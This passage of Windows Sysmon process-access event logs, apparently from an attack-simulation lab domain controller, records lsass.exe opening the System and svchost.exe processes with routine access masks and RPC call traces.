07:53:17.283","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"996","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F5F-5F25-0000-0010EB030000}","TargetProcessId":"4","TargetImage":"System","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1145,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:17.283\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 996\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F6D-5F25-0000-0010029D0200}\r\nTargetProcessId: 2240\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:17.283","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"996","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F6D-5F25-0000-0010029D0200}","TargetProcessId":"2240","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1146,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:17.283\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 996\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F6D-5F25-0000-0010029D0200}\r\nTargetProcessId: 2240\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:17.283","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"996","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F6D-5F25-0000-0010029D0200}","TargetProcessId":"2240","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1147,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:17.283\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 996\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F6D-5F25-0000-0010029D0200}\r\nTargetProcessId: 2240\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:17.283","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"996","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F6D-5F25-0000-0010029D0200}","TargetProcessId":"2240","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1148,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:17.283\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 996\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F6D-5F25-0000-0010029D0200}\r\nTargetProcessId: 2240\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:17.283","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"996","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F6D-5F25-0000-0010029D0200}","TargetProcessId":"2240","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1149,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:17.283\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 996\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F6D-5F25-0000-0010029D0200}\r\nTargetProcessId: 2240\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:17.283","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"996","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F6D-5F25-0000-0010029D0200}","TargetProcessId":"2240","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1150,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:17.283\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 996\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F6D-5F25-0000-0010029D0200}\r\nTargetProcessId: 2240\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:17.283","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"996","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F6D-5F25-0000-0010029D0200}","TargetProcessId":"2240","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1151,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:17.283\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 996\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F6D-5F25-0000-0010029D0200}\r\nTargetProcessId: 2240\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:17.283","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"996","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F6D-5F25-0000-0010029D0200}","TargetProcessId":"2240","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1152,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:17.283\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 996\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F6D-5F25-0000-0010029D0200}\r\nTargetProcessId: 2240\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: 